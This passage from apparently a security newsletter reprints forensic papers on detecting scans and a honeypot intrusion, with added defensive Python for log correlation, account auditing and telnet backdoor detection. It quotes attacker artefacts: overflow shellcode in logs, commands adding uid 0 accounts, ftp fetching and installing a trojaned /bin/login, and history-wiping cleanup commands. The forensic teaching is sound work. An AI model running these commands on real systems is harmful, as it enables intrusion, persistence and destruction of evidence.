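            while seen[end][0] - seen[start][0] > timedelta(seconds=window):
                start += 1
            services = {d for _, d in seen[start:end + 1]}
            if len(services) >= min_services and (best is None or len(services) > len(best[2])):
                best = (seen[start][0], seen[end][0], services)
        if best:
            findings.append({"source": src, "kind": kind, "first": best[0],
                             "last": best[1], "services": sorted(best[2])})
    return findings


if __name__ == "__main__":
    for f in find_scans(parse(SAMPLE_SECURE)):
        print(f"{f['kind']:12} from {f['source']:15} "
              f"{f['first']:%H:%M:%S}-{f['last']:%H:%M:%S} {', '.join(f['services'])}")
```

      A run with no findings does not mean no scan took place: the -sF, -sX
      and -sN scans above leave nothing in this log at all.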

      
      Did They Gain Access?
      Once you have determined that you were scanned, and what they were 
      looking for, the next big question is "Did they get in?".  Most of 
      today's remote exploits are based on buffer overflows (otherwise known 
      as smashing the stack).  Simply stated, a buffer overflow is when a 
      program (usually a daemon) receives more input than it expected, thus 
      overwriting critical areas in memory.  Certain code is then executed, 
      usually giving the user root access.  For more info on buffer overflows, 
      check Aleph1's excellent paper at 
      ftp://ftp.technotronic.com/rfc/phrack49-14.txt. 

      You can normally identify buffer overflow attacks in the /var/log/messages 
      log file (or /var/adm/messages for other flavors of Unix) for attacks such 
      as mountd.  You will also see similar logs in maillog for such attacks 
      against imapd.  A buffer overflow attack would look like this. 
      
      Apr 14 04:20:51 mozart mountd[6688]: Unauthorized access by NFS client 
      					   192.168.11.200. 
      Apr 14 04:20:51 mozart syslogd: Cannot glue message parts together 
      Apr 14 04:20:51 mozart mountd[6688]: Blocked attempt of 192.168.11.200 to mount 
      ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ 
      P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ 
      P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ 
      P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ 
      P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ 
      P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ 
      P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ 
      P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ 
      P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ 
      P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ 
      P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ 
      P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ 
      P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ 
      P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ 
      P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ 
      P~P~P33^[~@33~Kڰ^F~@u1^B~@~Eubb^V<t^Ft^K0~HF^^B~ 
      I^F~IF^D^F~IF^Hf1~I~@~I^F^Bf~IF^L*f~IF^N~MF^L~IF^D1~IF^P^P~IF^H 
      f~@^A~IF^Df^D~@^DLR1~IF^D~IF^Hf~@~Hð?1~@?~@?~@.bin@~ 
      I^F.sh!@~IF^D1~HF^G~Iv^H~IF^L^K~I~MN^H~MV^L~@1^A1~@EPrivet 
      ADMcrew~P(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(Apr 14 04:20:51 
      mozart ^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^ 
      E^H(-^E^H-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E 
      ^H(-^E^H-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^ H(-^E^H(-^E^H(-^E^H(-^E^H(-^E^H(-^E 
      ^H(-^E^H(-^E 
        
      
      When you see something like this in your log files, someone has attempted 
      to exploit your system.  It is difficult to determine if the exploit was 
      successful.  One way to do this is, following the exploit attempt, to see 
      if there are any connections from the remote source to your system.  If 
      they successfully log in from the remote system, they have access.  
      Another clue is if you find the accounts "moof", "rewt", "crak0", or 
      "w0rm" added to your /etc/passwd file.  These accounts, uid 0, are added 
      by some of the more common exploit scripts.  Once a black-hat gains 
      access, normally the first thing they do is wipe your logs clean and 
      trojan your logging (syslogd).  For more information, see Know Your 
      Enemy: III.  From this point on, you will not receive any logs from your 
      system as everything has been compromised.  What you do next is a 
      subject for another article :).   
      Until then, I recommend you check out 
      http://www.cert.org/nav/recovering.html 

      To help me find anomalies in my log files, I whipped up a shell script 
      that scans my logs for me.  For more detailed information on grepping and 
      sorting log files, check out this posting by Marcus Ranum.

      Bourne shell script          Korn shell script

      Conclusion
      Your system logs can tell you a great deal about the enemy.  However, 
      the first step is guaranteeing the integrity of your log files.  One of 
      the best ways to do that is to use a remote log server that receives and 
      stores logs from all systems.  Once secured, you can then identify 
      patterns in your log files.  Based on these patterns and log entries, 
      you can determine what the black-hat is looking for, and potentially 
      what tools they are using.  Based on this knowledge, you can better 
      secure and protect your systems. 

      
      @HWA

304.0 [IND] Paper: Know your enemy #3: Forensic Analysis by Lance Spitzner
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      The Study of an Attack 
      Know Your Enemy: A Forensic Analysis 

      Lance Spitzner http://www.enteract.com/~lspitz/papers.html Last Modified: 
      23 May 2000 

      This paper is a continuation of the Know Your Enemy series. The first 
      three papers covered the tools and tactics of the black-hat community.  
      This paper, the fourth of the series, studies step by step a successful 
      attack of a system.  However, instead of focusing on the tools and 
      tactics used, we will focus on how we learned what happened and pieced the 
      information together.  The purpose is to give you the forensic skills 
      necessary to analyze and learn on your own the threats your organization 
      faces. 

      Background
      The information covered here was obtained through the use of a honeypot.  
      The honeypot was a default server installation of Red Hat 6.0.  No 
      modifications were made to the default install, so the vulnerabilities 
      discussed here exist on any default RH 6.0 installation.  Also, none of 
      the data presented here has been sanitized.  All IP addresses, user 
      accounts, and keystrokes discussed here are real.  This is done on 
      purpose to both validate the data and give a better understanding of 
      forensic analysis.  Only the passwords have been modified to protect the 
      compromised systems.

      All sniffer information presented here is in snort format.  Snort is my 
      sniffer and IDS system of choice, due to its flexibility, capabilities, 
      and price (it's free).  All actions committed by the black-hat were 
      captured with snort.  I use the IDS signatures supplied by Max Vision at 
      www.whitehats.com.  You can query his arachNIDs database for more 
      information on all the alerts discussed throughout this paper.  You can 
      find my snort configuration and signature file (including the command 
      line options I use) here.

      Once you are done reading the paper, you can conduct your own forensic 
      analysis, as I have supplied all the raw data.  As you read this paper, 
      take note of how many different systems the black-hat uses.  Also, 
      throughout this paper, the black-hat is identified as she, but we have no 
      idea what the true gender is. 

      
      The Attack
      On 26 April, at 06:43 snort alerted me that one of my systems had been 
      attacked with a 'noop' attack.  Packet payloads containing noops are an 
      indication of a buffer overflow attack.  In this case, snort had 
      detected the attack and logged the alert to my /var/log/messages file 
      (which is monitored by swatch).  Note: throughout this paper, the IP 
      address 172.16.1.107 is the IP address of the honeypot.  All other 
      systems are the IP addresses used by the black-hat. 

      Apr 26 06:43:05 lisa snort[6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 
      172.16.1.107:53 

      My honeypots receive numerous probes, scans and queries on a daily basis.  
      However, an alert like this gets my immediate attention, as it indicates a 
      system may have been compromised.  Sure enough, less than two minutes 
      later system logs indicate the system is compromised, as our attacker 
      initiates a connection and logs in to the box. 

      Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user twin by (uid=0) 
      Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user hantu by twin(uid=506) 
      
      Our intruder has gained super user access and now controls the system.  How was this accomplished, what happened?  We will now begin our forensic analysis and put the pieces together, step by step. 
      
      The Analysis 
      When studying an attack, the best place to start is the beginning, where did the black-hat start?  Black-hats normally start with information gathering, they need to determine what vulnerabilities exist before they can strike.  If your system has been compromised, this is
      normally not the first time the black-hat has communicated with that system.  Most attacks involve some type of  information gathering before the attack is launched.  So, this is where we will start, the black-hat's information gathering stage. 
      
      If we look at the alert above, the attack was on port 53.  This indicates a DNS attack was launched on our system.  So I will begin by looking through my snort alerts to find possible information probes for DNS.  We find a DNS version query probe coming from the
      same system that attacked us. 
      
      Apr 25 02:08:07 lisa snort[5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53 
      Apr 25 02:08:07 lisa snort[5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53 
      
      Notice the date of the probe, April 25.  Our system was attacked April 26, from the same system.  Our system was compromised the day after the probe.  I am guessing that an automated tool was used by our black-hat to scan numerous systems for a known DNS
      vulnerability.  After the scan was run, the black-hat reviewed the results, identified vulnerable systems (including ours) and then launched her exploit.  We have now pieced together the first part of our story.  Our black-hat scanned us on 25 April, then exploited the
      system the following day.  Based on our IDS alerts, it appears we were hit by a script kiddie with a well known DNS vulnerability.  But how was the attack launched, and how does it work?  Let's find out. 
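
      The probe-then-exploit sequence pieced together above can be rebuilt
      automatically from the same logs.  This added example (not from the
      paper) links each exploit-class snort alert to earlier alerts from the
      same source and to sessions opened on the victim shortly afterwards; it
      matches sessions by host and time because the PAM lines carry no source
      address.  The victim7 hostname mapping, the 300-second window and the
      function names are assumptions.

```python
import re
from datetime import datetime

# The five log lines quoted in this paper, merged into one stream.
SAMPLE_LOG = """\
Apr 25 02:08:07 lisa snort[5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53
Apr 25 02:08:07 lisa snort[5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53
Apr 26 06:43:05 lisa snort[6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user twin by (uid=0)
Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user hantu by twin(uid=506)
"""
# Assumption: the honeypot 172.16.1.107 is the host that logs as "victim7".
HOST_FOR_IP = {"172.16.1.107": "victim7"}
EXPLOIT_SIGS = {"IDS181/nops-x86"}      # alerts treated as exploit attempts

SNORT = re.compile(r"^(\w{3} +\d+ [\d:]{8}) \S+ snort\[\d+\]: (\S+): "
                   r"([\d.]+):(\d+) -> ([\d.]+):(\d+)")
PAM = re.compile(r"^(\w{3} +\d+ [\d:]{8}) (\S+) PAM_pwdb\[\d+\]: "
                 r"\((\w+)\) session opened for user (\S+) by (\S*)\(uid=(\d+)\)")


def when(stamp, year):
    """Syslog timestamps carry no year, so the caller supplies it."""
    return datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")


def correlate(log_text, host_for_ip, exploit_sigs, year=2000, follow_secs=300):
    """Build one incident record per exploit-class alert."""
    alerts, sessions = [], []
    for raw in log_text.splitlines():
        line = raw.strip()
        m = SNORT.match(line)
        if m:
            alerts.append({"time": when(m.group(1), year), "sig": m.group(2),
                           "src": m.group(3), "dst": m.group(5)})
            continue
        m = PAM.match(line)
        if m:
            sessions.append({"time": when(m.group(1), year), "host": m.group(2),
                             "service": m.group(3), "user": m.group(4)})

    incidents = []
    for hit in alerts:
        if hit["sig"] not in exploit_sigs:
            continue
        # Information gathering: earlier non-exploit alerts, same source and target.
        recon = [a for a in alerts
                 if a["src"] == hit["src"] and a["dst"] == hit["dst"]
                 and a["time"] < hit["time"] and a["sig"] not in exploit_sigs]
        lead = None
        if recon:
            first = min(a["time"] for a in recon)
            lead = int((hit["time"] - first).total_seconds())
        # Sessions opened on the victim within follow_secs of the alert.
        victim = host_for_ip.get(hit["dst"])
        after = []
        for s in sessions:
            delay = int((s["time"] - hit["time"]).total_seconds())
            if s["host"] == victim and 0 <= delay <= follow_secs:
                after.append((delay, s["service"], s["user"]))
        incidents.append({"attacker": hit["src"], "victim_ip": hit["dst"],
                          "recon": sorted({a["sig"] for a in recon}),
                          "recon_lead_secs": lead,
                          "sessions": sorted(after),
                          "followed_by_session": bool(after)})
    return incidents


if __name__ == "__main__":
    for inc in correlate(SAMPLE_LOG, HOST_FOR_IP, EXPLOIT_SIGS):
        print(inc)
```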
      
      The Exploit 
      Like most commercial IDS systems, snort has the capability of showing us the packet load data of all IP packets.  We will use this capability to conduct an analysis of the exploit.  The exploit information was obtained from the snort logs (stored in tcpdump binary
      format).  I queried the snort log and began reviewing the packets starting when the attack was launched.  I did not limit my information query to the host 63.226.81.13, as the attacker may have used other systems.  This is in fact the case, as our black-hat used at least
      three different systems to run the exploit.  The goal of the exploit is to gain a root shell on the remote system.  Once the black-hat gains a root shell, they can run any command as root.  Normally an account is placed in the /etc/passwd and /etc/shadow file.  You can
      find both the exploit and remote commands executed in the detailed forensic analysis.  Once the exploit was run and a root shell obtained, the following commands were run as root. 
      
      cd /; uname -a; pwd; id; 
      Linux apollo.uicmba.edu 2.2.5-15 #1 Mon Apr 19 22:21:09 EDT 1999 i586 unknown 
      / 
      uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) 
      echo "twin::506:506::/home/twin:/bin/bash" >> /etc/passwd 
      echo "twin:w3nT2H0b6AjM2:::::::" >> /etc/shadow 
      
      echo "hantu::0:0::/:/bin/bash" >> /etc/passwd 
      echo "hantu:w3nT2H0b6AjM2:::::::" >> /etc/shadow 
      
      Our black-hat runs several commands as root.  First, she confirms the system she is on (uname -a), the directory (pwd) and then confirms her uid (id).  She then adds two user accounts to the system, twin and hantu, both with the same password.  Note that twin
      has the UID of 506 and hantu has the UID of 0 (on a side note, hantu means ghost in Indonesian).  Remember, most systems do not let UID 0 telnet to the box.  So she had to create an account that would give her remote access, then another account that would give
      her UID 0.  So, our black-hat ran an exploit on DNS, gained a root shell, then inserted two accounts.  Within 90 seconds of the exploit she telnets into the box and gains root access (see timestamps of logs below).  So, what does she do next? 
      
      Apr 26 06:43:05 lisa snort[6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53 
      Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user twin by (uid=0) 
      Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user hantu by twin(uid=506) 
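
      Both this paper and the previous one point to added accounts as evidence
      of a compromise.  The following added example (not the author's code)
      audits passwd and shadow content for the traits visible in the entries
      above: extra uid 0 accounts, empty passwd password fields, shared hashes
      and missing last-change dates, plus the account names listed in the
      earlier paper.  Entries other than twin and hantu are constructed, and
      the last-change check is a heuristic that assumes accounts are normally
      created with the standard tools.

```python
from collections import defaultdict

# The twin and hantu lines are the ones the intruder appended in this paper;
# the other entries and their "$1$..." hashes are constructed placeholders.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
alice:x:500:500:Alice:/home/alice:/bin/bash
twin::506:506::/home/twin:/bin/bash
hantu::0:0::/:/bin/bash
"""
SHADOW = """\
root:$1$constructed$ROOTPLACEHOLDERHASH000:10950:0:99999:7:::
bin:*:10950:0:99999:7:::
alice:$1$constructed$ALICEPLACEHOLDERHASH0:10990:0:99999:7:::
twin:w3nT2H0b6AjM2:::::::
hantu:w3nT2H0b6AjM2:::::::
"""
# Account names the earlier paper says common exploit scripts add.
SCRIPT_NAMES = {"moof", "rewt", "crak0", "w0rm"}


def audit_accounts(passwd_text, shadow_text, expected_uid0=("root",)):
    """Return sorted (account, reason) pairs for suspicious entries."""
    findings = set()
    for line in passwd_text.splitlines():
        if not line.strip():
            continue
        f = line.strip().split(":")
        if len(f) != 7:
            findings.add((f[0], "malformed passwd entry"))
            continue
        name, pw, uid = f[0], f[1], f[2]
        if uid.isdigit() and int(uid) == 0 and name not in expected_uid0:
            findings.add((name, "uid 0 account not in expected list"))
        if pw == "":
            findings.add((name, "empty password field in passwd"))
        if name in SCRIPT_NAMES:
            findings.add((name, "name used by common exploit scripts"))

    by_hash = defaultdict(list)
    for line in shadow_text.splitlines():
        f = line.strip().split(":")
        if len(f) < 3:
            continue
        name, pw, last_change = f[0], f[1], f[2]
        if not pw or pw[0] in "!*":
            continue            # locked or empty entry, no hash to compare
        by_hash[pw].append(name)
        # Heuristic: a hand-appended line like the ones above leaves the
        # last-change field empty.
        if last_change == "":
            findings.add((name, "password set but no last-change date in shadow"))
    for names in by_hash.values():
        if len(names) > 1:
            findings.add((",".join(sorted(names)),
                          "password hash shared between accounts"))
    return sorted(findings)


if __name__ == "__main__":
    for account, reason in audit_accounts(PASSWD, SHADOW):
        print(f"{account:12} {reason}")
```

      Run it against copies of the files taken from read-only or offline
      media; on a compromised host the local tools and files cannot be trusted.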
      
      Gaining Access 
      Fortunately for us, telnet is a plaintext protocol, the data is not encrypted.  This means we can decode the sniffer traces and capture all of her keystrokes.  Snort has already done this for us, another reason I prefer snort.  By analyzing the keystrokes snort captured of
      the telnet sessions, we can determine what our black-hat does.  What I like best about decoding telnet sessions is that we capture not only STDIN (the keystrokes) but STDOUT and STDERR.  Let's review the telnet sessions and identify the black-hat's activities
      (comments in RED). 
      
      First, our friend telnets to the box (from 213.28.22.189) as twin and then gains superuser access as hantu. Remember, she cannot just telnet in as hantu as UID 0 is restricted for remote access.
      
       #' !"'!"# ' 9600,9600'VT5444VT5444 
      Red Hat Linux release 6.0 (Shedwig) 
      Kernel 2.2.5-15 on an i586 
      login: twin 
      Password: Password: hax0r 
      No directory /home/twin! 
      Logging in with home = "/". 
      [twin@apollo /]$ su hantu 
      Password: Password: hax0r 
      
      Next, our friend ftps to another system to get her toolkit. 
      
      [root@apollo /]# ftp 24.112.167.35 
      Connected to 24.112.167.35. 
      220 linux FTP server (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999) ready. 
      Name (24.112.167.35:twin): welek 
      331 Password required for welek. 
      Password:password 
      230 User welek logged in. 
      Remote system type is UNIX. 
      Using binary mode to transfer files. 
      ftp> get bj.c 
      local: bj.c remote: bj.c 
      200 PORT command successful. 
      150 Opening BINARY mode data connection for bj.c (1010 bytes). 
      226 Transfer complete. 
      1010 bytes received in 0.115 secs (8.6 Kbytes/sec) 
      ftp> quit 
      221-You have transferred 1010 bytes in 1 files. 
      221-Total traffic for this session was 1421 bytes in 1 transfers. 
      221-Thank you for using the FTP service on linux. 
      221 Goodbye. 
      
      Third, she grabs her backdoor, compiles bj.c, and installs it as a replacement for /sbin/login. Notice all the commands executed at the command prompt for the compile. It appears that all the
      compile commands were executed 'cut and paste' style. 
      
      [root@apollo /]# gcc -o login bj.cchown root:bin loginchmod 4555 loginchmod u-w logincp /bin/login /usr/bin/xstatcp /bin/login /usr/bin/old                 rm /bin/loginchmod 555
      /usr/bin/xstatchgrp bin /usr/bin/xstatmv login /bin/loginrm bj.cgcc -o login bj.c 
      bj.c:16: unterminated string or character constant 
      bj.c:12: possible real start of unterminated constant 
      
      She now attempts to implement the compiled backdoor. 
      
      [root@apollo /]# chown root:bin login 
      chown: login: No such file or directory 
      [root@apollo /]# chmod 4555 login 
      chmod: login: No such file or directory 
      [root@apollo /]# chmod u-w login 
      chmod: login: No such file or directory 
      [root@apollo /]# cp /bin/login /usr/bin/xstat 
      [root@apollo /]# cp /bin/login /usr/bin/old 
      [root@apollo /]# rm /bin/login 
      [root@apollo /]# chmod 555 /usr/bin/xstat 
      [root@apollo /]# chgrp bin /usr/bin/xstat 
      [root@apollo /]# mv login /bin/login 
      mv: login: No such file or directory 
      [root@apollo /]# rm bj.c 
      
      Dooh!  She just can't get it right, let's try again. She ftp's to the site and re-downloads the backdoor. 
      
      [root@apollo /]# ftp 24.112.167.35 
      Connected to 24.112.167.35. 
      220 linux FTP server (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999) ready. 
      Name (24.112.167.35:twin): [root@apollo /]#   ftp 24.112.167.35 
      Connected to 24.112.167.35. 
      220 linux FTP server (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999) ready. 
      Name (24.112.167.35:twin): welek 
      331 Password required for welek. 
      Password:331 Password required for welek. 
      Password:password 
      230 User welek logged in. 
      Remote system type is UNIX. 
      Using binary mode to transfer files. 
      ftp> get bj.c 
      qulocal: bj.c remote: bj.c 
      200 PORT command successful. 
      u150 Opening BINARY mode data connection for bj.c (1011 bytes). 
      226 Transfer complete. 
      1011 bytes received in 0.134 secs (7.3 Kbytes/sec) 
      ftp> itit 
      221-You have transferred 1011 bytes in 1 files. 
      221-Total traffic for this session was 1422 bytes in 1 transfers. 
      221-Thank you for using the FTP service on linux. 
      221 Goodbye. 
      
      This is now her second attempt at compiling the backdoor. Notice the exact same "cut and paste" commands are used. 
      
      [root@apollo /]# gcc -o login bj.cchown root:bin loginchmod 4555 loginchmod u-w logincp /bin/login /usr/bin/xstatcp /bin/login /usr/bin/old                 rm /bin/loginchmod 555
      /usr/bin/xstatchgrp bin /usr/bin/xstatmv login /bin/loginrm bj.cgcc -o login bj.c 
      bj.c: In function `owned': 
      bj.c:16: warning: assignment makes pointer from integer without a cast 
      
      Now we see the compiled backdoor implemented. The valid copy of /bin/login is moved to /usr/bin/xstat, while the compiled trojan bj.c is used to replace /bin/login. This is the backdoor. This
      trojan allows anyone with the TERM setting of vt9111 unauthorized access. 
      
      [root@apollo /]# chown root:bin login 
      [root@apollo /]# chmod 4555 login 
      [root@apollo /]# chmod u-w login 
      [root@apollo /]# cp /bin/login /usr/bin/xstat 
      cp: /bin/login: No such file or directory 
      [root@apollo /]# cp /bin/login /usr/bin/old 
      cp: /bin/login: No such file or directory 
      [root@apollo /]# rm /bin/login 
      rm: cannot remove `/bin/login': No such file or directory 
      [root@apollo /]# chmod 555 /usr/bin/xstat 
      [root@apollo /]# chgrp bin /usr/bin/xstat 
      [root@apollo /]# mv login /bin/login 
      
      Now she covers her moves.  I believe this is scripted, cut and paste.  Look at all the commands she executed at a single command prompt.  Also, I believe this is a 'generic' clean up script,
      notice how it tries to remove files that do not exist (such as /tmp/h). 
      
      [root@apollo /]# rm bj.c 
      [root@apollo /]# [root@apollo /]# ps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/portmap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bash_history ; rm -rf
      /usr/sbin/namedps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/por<grep inetd ; ps -aux | grep portmap ; rm /sbin/port                         map ; rm /tmp/h ; rm /usr<p portmap ; rm
      /sbin/portmap ; rm /tmp/h ; rm /usr/                         sbin/rpc.portmap ; rm -rf<ap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf                          .bash* ; rm -rf
      /root/.ba<bin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bas                         h_history ; rm -rf /usr/s<bash* ; rm -rf /root/.bash_history ; rm -rf /usr/sb                        
      in/named 
        359 ?        00:00:00 inetd 
        359 ?        00:00:00 inetd 
      rm: cannot remove `/tmp/h': No such file or directory 
      rm: cannot remove `/usr/sbin/rpc.portmap': No such file or directory 
      [root@apollo /]# ps -aux | grep portmap 
      [root@apollo /]# [root@apollo /]# ps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/portmap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bash_history ; rm -rf
      /usr/sbin/namedps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/por<grep inetd ; ps -aux | grep portmap ; rm /sbin/port                         map ; rm /tmp/h ; rm /usr<p portmap ; rm
      /sbin/portmap ; rm /tmp/h ; rm /usr/                         sbin/rpc.portmap ; rm -rf<ap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf                          .bash* ; rm -rf
      /root/.ba<bin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bas                         h_history ; rm -rf /usr/s<bash* ; rm -rf /root/.bash_history ; rm -rf /usr/sb                        
      in/named 
        359 ?        00:00:00 inetd 
      rm: cannot remove `/sbin/portmap': No such file or directory 
      rm: cannot remove `/tmp/h': No such file or directory 
      rm: cannot remove `/usr/sbin/rpc.portmap': No such file or directory 
      [root@apollo /]# rm: cannot remove `/sbin/portmap': No such file or directory 
      
      I find this interesting. Our black-hat's generic clean up script generated errors as it attempted to remove files that did not exist. I believe our black-hat saw these errors and became
      concerned, because she then attempts to manually remove these same files, even though they do not exist. 
      
      rm: cannot remove `/tmp/h': No such file or directory 
      rm: cannot remove `/usr/sbin/rpc.portmap': No such file or directory 
      [root@apollo /]# rm: cannot remove `/sbin/portmap': No such file or directory 
      rm: cannot remove `/tmp/h': No such file or directory 
      rm: cannot remove `/usr/sbin/rpc.portmap': No such file or directory 
      [root@apollo /]# exit 
      exit 
      [twin@apollo /]$ exit 
      logout 
      
      That's it, our friend has installed a backdoor, bj.c.  The backdoor allows unauthenticated users in based on the TERM setting, in this case VT9111.  Once completed, she logged out from the
      system. 
      
      After leaving the system, the black hat made several more connections and modifications to the systems.  Review the raw data to review the black-hat's keystrokes. 
      
      Trinoo, The Return 
      Once the system had been compromised, I took it offline to review the data (such as Tripwire).  However, I noticed over the next week that a variety of systems were attempting to telnet to the box.  Apparently the black-hat wanted back in, most likely to use the
      compromised system for more nefarious activity.  So, I brought the compromised box back online, curious to see if the black-hat would return and what she would do.  Sure enough, almost two weeks later, she returned.  Once again, we captured all the keystrokes
      using snort.  Review the following telnet sessions and learn how our compromised system was to be used as a Trinoo client. 
      
      On May 9, 10:45 am, our friend telnets in from 24.7.85.192.  Note how she uses the backdoor VT9111 to get into the system, bypassing authentication. 
      
       !"' #'!"# ' 9600,9600'VT9111VT9111 
      Red Hat Linux release 6.0 (Shedwig) 
      Kernel 2.2.5-15 on an i586 
      [root@apollo /]# ls 
      bin   cdrom  etc     home  lost+found  proc  sbin  usr 
      boot  dev    floppy  lib   mnt       root  tmp   var 
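
      A detection for this kind of backdoor, as an added example that is not part of the original paper. It assumes the magic TERM value reaches the server in the telnet TERMINAL-TYPE subnegotiation (RFC 1091), as it does for a standard telnet client. The allowlist and both sample streams are constructed.

```python
"""Flag telnet clients that announce a terminal type outside an allowlist."""

IAC, SB, SE = 255, 250, 240             # telnet command bytes (RFC 854)
WILL, DONT = 251, 254                   # WILL/WONT/DO/DONT occupy 251..254
TERMINAL_TYPE, TERMINAL_SPEED = 24, 32  # option codes
IS = 0                                  # sub-command: "my value IS ..."

# Terminal types this site expects to see. Constructed list; tune per site.
KNOWN_TERMS = {"vt100", "vt102", "vt220", "xterm", "ansi", "linux",
               "dumb", "network", "unknown"}


def subnegotiations(stream):
    """Yield (option, payload) for each complete IAC SB ... IAC SE block."""
    i, n = 0, len(stream)
    while i + 1 < n:
        if stream[i] != IAC:
            i += 1
        elif WILL <= stream[i + 1] <= DONT:
            i += 3                      # IAC WILL/WONT/DO/DONT <option>
        elif stream[i + 1] != SB:
            i += 2                      # IAC IAC (escaped 0xff) or other command
        else:
            body, j, closed = bytearray(), i + 2, False
            while j < n:
                if stream[j] == IAC and j + 1 < n and stream[j + 1] == SE:
                    closed, j = True, j + 2
                    break
                if stream[j] == IAC and j + 1 < n and stream[j + 1] == IAC:
                    j += 1              # un-escape a doubled 0xff
                body.append(stream[j])
                j += 1
            if not closed:
                return                  # capture ends in the middle of a block
            if body:
                yield body[0], bytes(body[1:])
            i = j


def terminal_types(stream):
    """Return the terminal types a client sent via TERMINAL-TYPE IS."""
    return [payload[1:].decode("ascii", "replace")
            for option, payload in subnegotiations(stream)
            if option == TERMINAL_TYPE and payload[:1] == bytes([IS])]


def unexpected_terms(stream, known=KNOWN_TERMS):
    """Terminal types worth alerting on: anything outside the allowlist."""
    return [t for t in terminal_types(stream) if t.lower() not in known]


def _sb(option, value):
    """Build one 'IAC SB <option> IS <value> IAC SE' block for the samples."""
    return bytes([IAC, SB, option, IS]) + value + bytes([IAC, SE])


# Constructed client-to-server streams. "VT9111" is the value from the capture.
BACKDOOR_SESSION = (bytes([IAC, WILL, TERMINAL_TYPE, IAC, WILL, TERMINAL_SPEED])
                    + _sb(TERMINAL_SPEED, b"9600,9600")
                    + _sb(TERMINAL_TYPE, b"VT9111") + b"ls\r\n")
NORMAL_SESSION = bytes([IAC, WILL, TERMINAL_TYPE]) + _sb(TERMINAL_TYPE, b"VT100")

if __name__ == "__main__":
    for label, data in (("backdoor", BACKDOOR_SESSION), ("normal", NORMAL_SESSION)):
        print(label, terminal_types(data), "->", unexpected_terms(data))
```

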